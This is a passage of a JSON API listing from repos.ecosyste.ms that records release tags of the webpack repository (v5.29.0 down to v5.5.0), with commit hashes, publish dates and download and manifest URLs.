os.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253